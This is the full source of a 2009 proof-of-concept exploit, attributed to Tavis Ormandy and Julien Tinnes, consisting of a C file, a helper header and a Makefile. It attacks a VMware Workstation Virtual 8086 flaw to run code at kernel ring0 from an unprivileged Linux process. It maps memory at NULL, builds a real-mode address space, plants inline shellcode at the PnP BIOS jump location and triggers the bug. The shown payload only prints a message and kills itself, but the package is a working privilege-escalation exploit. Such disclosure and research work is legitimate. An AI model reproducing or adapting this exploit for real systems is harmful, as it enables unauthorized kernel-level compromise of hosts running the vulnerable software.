----------------------------------------vmware86.c----------------------------------------
// // ----------------------------------- // VMWare Workstation Virtual 8086 Linux Local ring0 // --------------------------- taviso@sdf.lonestar.org, julien@cr0.org ----- // // Tavis Ormandy and Julien Tinnes, June 2009 // //
#ifndef _GNU_SOURCE # define _GNU_SOURCE #endif #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <stdbool.h> #include <stdint.h> #include <string.h> #include <signal.h> #include <sys/mman.h> #include <sys/user.h> #include <sys/vm86.h> #include <asm/unistd.h>
#include "vm86util.h"
static bool InitialiseVirtual8086(); static bool InstallShellCode(); static bool EnterVirtual8086(); static bool MapPageAtNull();
int main(int argc, char **argv) { // Get a page mapped at NULL if (MapPageAtNull()) { fprintf(stderr, "mmap() failed: %m\n"); return 1; }
// Setup the Virtual 8086 address space InitialiseVirtual8086();
// Install the shellcode that executes once we've gained control of the kernel InstallShellCode();
// Trigger the VMWare Vulnerability EnterVirtual8086();
// Not Reached abort(); }
static bool MapPageAtNull() { return mmap(NULL, PAGE_SIZE, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0) == MAP_FAILED; }
static char Message[1024]; static size_t MessageSize;
static bool InstallShellCode() { uint8_t *code; uint32_t codesize;
// Message to print from ring0 MessageSize = snprintf(Message, sizeof(Message), "<script>alert('ring0')</script>\n");
CODE32("mov esp, edi \n" // Restore a usable stack "sub esp, 0x50 \n" // Fixup stack pointer
// Print message "mov edx, MessageSize \n" // len "lea ecx, Message \n" // buf "mov ebx, " SYM(STDOUT_FILENO) " \n" // fd "mov eax, " SYM(__NR_write) " \n" "int 0x80 \n" // write(STDOUT_FILENO, Message, sizeof(Message));
// Now kill this process "mov eax, " SYM(__NR_getpid) " \n" "int 0x80 \n" // getpid() "mov ebx, eax \n" // pid "mov ecx, " SYM(SIGKILL) " \n" // signal "mov eax, " SYM(__NR_kill) " \n" "int 0x80 \n", // kill(getpid(), SIGKILL); code, codesize);
// Install it to the pnp bios jmp location memcpy(REAL(0x0000, 0x0000), code, codesize);
return true; }
static bool EnterVirtual8086() { uint8_t *code; uint32_t codesize; vm86_t vm = {0};
// Setup cpu type vm.cpu_type = CPU_586;
// Setup registers vm.regs.eflags = EFLAGS_TF_MASK; vm.regs.esp = 0xDEADBEEF; vm.regs.eip = 0x00000000; vm.regs.cs = 0x0090; vm.regs.ss = 0xFFFF;
CODE16("call 0xaabb:0xccdd", code, codesize);
memcpy(REAL(vm.regs.cs, vm.regs.eip), code, codesize);
vm86(Vm86Enter, &vm);
return false; }
static bool InitialiseVirtual8086() { // Make the MMAP_PAGE_ZERO page rwx if (mprotect(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) { return false; }
// Stretch the page to 1MB for the entire real mode address space if (mremap(NULL, PAGE_SIZE, 1024 * 1024, 0) == MAP_FAILED) { return false; }
// All done return true; }
---------------------------------vm86util.h-----------------------------------------
#ifndef __VM86UTIL_H
#define SYM(s) STR(s) #define STR(s) #s
typedef enum { Vm86PlusInstallCheck, Vm86Enter, Vm86EnterNoBypass, Vm86RequestIrq, Vm86FreeIrq, Vm86GetIrqBits, Vm86GetAndResetIrq, } vm86func_t;
typedef struct vm86_regs vm86regs_t; typedef struct vm86plus_struct vm86_t;
// Calculate a linear address from CS:IP pair #define REAL(cs,ip) ((void *)(((cs) << 4) + ((ip) & 0xffff)))
#define EFLAGS_CF_MASK 0x00000001 // carry flag #define EFLAGS_PF_MASK 0x00000004 // parity flag #define EFLAGS_AF_MASK 0x00000010 // auxiliary carry flag #define EFLAGS_ZF_MASK 0x00000040 // zero flag #define EFLAGS_SF_MASK 0x00000080 // sign flag #define EFLAGS_TF_MASK 0x00000100 // trap flag #define EFLAGS_IF_MASK 0x00000200 // interrupt flag #define EFLAGS_DF_MASK 0x00000400 // direction flag #define EFLAGS_OF_MASK 0x00000800 // overflow flag #define EFLAGS_IOPL_MASK 0x00003000 // I/O privilege level #define EFLAGS_NT_MASK 0x00004000 // nested task #define EFLAGS_RF_MASK 0x00010000 // resume flag #define EFLAGS_VM_MASK 0x00020000 // virtual 8086 mode #define EFLAGS_AC_MASK 0x00040000 // alignment check #define EFLAGS_VIF_MASK 0x00080000 // virtual interrupt flag #define EFLAGS_VIP_MASK 0x00100000 // virtual interrupt pending #define EFLAGS_ID_MASK 0x00200000 // identification flag
#ifdef __OPTIMIZE__ # error The CODE16() and CODE32() macros might be eliminated as dead code with optimization enabled. #endif
// Generate 16bit code inline #define CODE16(code, label, size) do { \ __label__ c16start, c16end; \ volatile uint8_t *end = &&c16end; \ goto *end; c16start: \ asm volatile (".intel_syntax noprefix\n" \ ".code16\n" \ code "\n" \ ".code32\n" \ ".att_syntax prefix\n"); \ c16end: \ (label) = &&c16start; \ (size) = end - (label); \ } while (false)
// Generate 32bit code inline #define CODE32(code, label, size) do { \ __label__ c32start, c32end; \ volatile uint8_t *end = &&c32end; \ goto *end; c32start: \ asm volatile (".intel_syntax noprefix\n" \ code "\n" \ ".att_syntax prefix\n"); \ c32end: \ (label) = &&c32start; \ (size) = end - (label); \ } while (false)
#define __VM86UTIL_H #else # warning vm86util.h included twice #endif
------------------------------Makefile-----------------------------
all: vmware86
clean: rm -f vmware86 *.o *.core core
vmware86: vmware86.c gcc -m32 $< -o $@
|